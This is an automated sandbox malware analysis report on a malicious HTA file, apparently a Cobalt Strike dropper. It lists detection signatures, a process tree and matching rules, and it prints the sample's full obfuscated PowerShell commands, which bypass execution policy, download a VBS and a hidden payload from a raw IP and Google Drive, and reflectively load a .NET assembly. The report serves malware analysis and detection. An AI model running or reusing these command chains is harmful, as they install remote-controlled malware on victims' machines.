Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
greatthingswithmegood.hta

Overview

General Information

Sample name:greatthingswithmegood.hta
Analysis ID:1545195
MD5:d61ef0038de65f697abb0b7a21b499db
SHA1:f8facfa18bf5eeecaa0601e8c1690fe60fe02ff8
SHA256:8762a9dea77db2f44207cc9edbc192f5776f7ac8532440ae60a65f5102f8ec93
Tags:htauser-abuse_ch
Infos:

Detection

Cobalt Strike, HTMLPhisher
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Cobalt Strike Beacon
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected HtmlPhish44
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • mshta.exe (PID: 5836 cmdline: mshta.exe "C:\Users\user\Desktop\greatthingswithmegood.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 6512 cmdline: "C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6516 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • csc.exe (PID: 4832 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ly0yjdqb\ly0yjdqb.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 1020 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2C04.tmp" "c:\Users\user\AppData\Local\Temp\ly0yjdqb\CSC746F8121F2314519843BE09F69B09E4D.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • wscript.exe (PID: 6408 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
        • powershell.exe (PID: 7136 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 2876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6004 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
greatthingswithmegood.htaJoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    Process Memory Space: powershell.exe PID: 7136INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x368f:$b2: ::FromBase64String(
    • 0x418c:$b2: ::FromBase64String(
    • 0x53fd:$b2: ::FromBase64String(
    • 0x5ad5:$b2: ::FromBase64String(
    • 0x63b9:$b2: ::FromBase64String(
    • 0x6a1b:$b2: ::FromBase64String(
    • 0x8ac24:$b2: ::FromBase64String(
    • 0xd9d4a:$b2: ::FromBase64String(
    • 0x3440:$b3: ::UTF8.GetString(
    • 0x3f3d:$b3: ::UTF8.GetString(
    • 0x51ae:$b3: ::UTF8.GetString(
    • 0x5886:$b3: ::UTF8.GetString(
    • 0x616a:$b3: ::UTF8.GetString(
    • 0x67cc:$b3: ::UTF8.GetString(
    • 0x790d:$b3: ::UTF8.GetString(
    • 0x81d5:$b3: ::UTF8.GetString(
    • 0x8ca6:$b3: ::UTF8.GetString(
    • 0x9749:$b3: ::UTF8.GetString(
    • 0x22eb3:$b3: ::UTF8.GetString(
    • 0x23771:$b3: ::UTF8.GetString(
    • 0x2539a:$b3: ::UTF8.GetString(
    Process Memory Space: powershell.exe PID: 6004JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 6004INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0xe075d:$b2: ::FromBase64String(
      • 0xe0db0:$b2: ::FromBase64String(
      • 0xe3ec0:$b2: ::FromBase64String(
      • 0xfe8fc:$b2: ::FromBase64String(
      • 0xfef46:$b2: ::FromBase64String(
      • 0x13283d:$b2: ::FromBase64String(
      • 0x136d40:$b2: ::FromBase64String(
      • 0x13738a:$b2: ::FromBase64String(
      • 0x13dbb3:$b2: ::FromBase64String(
      • 0x13e1fd:$b2: ::FromBase64String(
      • 0x155fbc:$b2: ::FromBase64String(
      • 0x15660d:$b2: ::FromBase64String(
      • 0x156e9a:$b2: ::FromBase64String(
      • 0x1576b6:$b2: ::FromBase64String(
      • 0x159d97:$b2: ::FromBase64String(
      • 0x15af41:$b2: ::FromBase64String(
      • 0x15ccd5:$b2: ::FromBase64String(
      • 0x177027:$b2: ::FromBase64String(
      • 0x1a52ea:$b2: ::FromBase64String(
      • 0x1a5934:$b2: ::FromBase64String(
      • 0x1a6018:$b2: ::FromBase64String(

      Other

      SourceRuleDescriptionAuthorStrings
      amsi32_6512.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security
        amsi32_6004.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          amsi32_6004.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Base64 Encoded PowerShell Command Detected
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0Jysn
            Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
            Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowse
            Sigma detected: Potential PowerShell Command Line Obfuscation
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, 